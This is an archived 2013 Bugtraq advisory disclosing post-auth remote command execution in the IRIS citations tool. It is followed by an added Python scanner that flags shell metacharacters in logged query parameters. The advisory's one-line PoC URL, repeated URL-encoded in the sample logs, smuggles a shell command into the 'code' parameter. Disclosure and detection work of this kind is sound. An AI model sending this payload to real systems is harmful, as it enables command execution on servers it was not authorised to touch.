lists.openwall.net: Open Source and information security mailing list archives
Message-Id: <201302092111.r19LBOGT022065@sf01web3.securityfocus.com>
Date: Sat, 9 Feb 2013 21:11:24 GMT
From: aeon.s.flux@...il.com
To: bugtraq@...urityfocus.com
Subject: I Read It Somewhere (IRIS) citations management tool <= v1.3 (post auth) Remote Command Execution

A vulnerability exists in the IRIS citations management tool which allows a low-privileged attacker to execute arbitrary commands.

Details can be found on my blog:
https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/

PoC:
http://[target]/[path]/index.php?p=add&import=spnro&code=a"+-T+0.1+||echo+`id`+>+/tmp/luls||"

~ aeon
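A defender-side check for the class of request shown in the PoC above, added here as an example and not part of the advisory or of the IRIS project: a small scanner that reads web-server access-log lines, URL-decodes each query parameter, and flags any value carrying shell metacharacters (pipes, backticks, redirections, `$(`). The Common Log Format layout, the `/iris/` install path and the sample log lines are constructed for the example; only the parameter names `p`, `import` and `code` come from the advisory. Because the issue is post-auth, the authenticated user field is reported alongside the source address so that the account can be reviewed, not just the IP.

```python
"""Flag web requests whose query parameters carry shell metacharacters.

Added example (not from the advisory or the IRIS project).  Log layout,
install path and sample lines are constructed; the parameter names p,
import and code are the ones the advisory's PoC uses.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Common Log Format style line; only the request target is analysed further.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Characters that a citation lookup code should never legitimately contain.
SHELL_META = re.compile(r'[|;`$><&]')


def suspicious_params(target):
    """Return {param: decoded value} for every query parameter that contains
    a shell metacharacter after URL decoding (parse_qs decodes %XX and '+')."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    hits = {}
    for name, values in params.items():
        for value in values:
            if SHELL_META.search(value):
                hits[name] = value
    return hits


def scan_log(lines):
    """Parse access-log lines; return (ip, user, target, hits) for each flagged request.
    Lines that do not match the expected layout are skipped rather than failing the scan."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m.group('target'))
        if hits:
            findings.append((m.group('ip'), m.group('user'), m.group('target'), hits))
    return findings


# Constructed sample traffic (not real log data): one normal import, one
# request shaped like the advisory's PoC with the metacharacters URL-encoded
# as a browser or client would send them, and one unrelated page view.
SAMPLE_LOG = [
    '10.0.0.5 - alice [09/Feb/2013:21:05:11 +0000] '
    '"GET /iris/index.php?p=add&import=spnro&code=12345 HTTP/1.1" 200 512',
    '10.0.0.9 - bob [09/Feb/2013:21:11:24 +0000] '
    '"GET /iris/index.php?p=add&import=spnro&code=a%22+-T+0.1+%7C%7Cecho+%60id%60+%3E+/tmp/luls%7C%7C%22 HTTP/1.1" 200 498',
    '10.0.0.5 - alice [09/Feb/2013:21:12:02 +0000] '
    '"GET /iris/index.php?p=list HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, user, target, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} user={user} {target} -> {hits}")
```

The metacharacter list is deliberately broad: a numeric or alphanumeric citation identifier has no legitimate reason to contain any of them, so false positives on this parameter are cheap while a miss is not. Running the scanner over the constructed lines flags only bob's request and shows the decoded `code` value, which is the string that would reach the command line if the application passed it through unescaped.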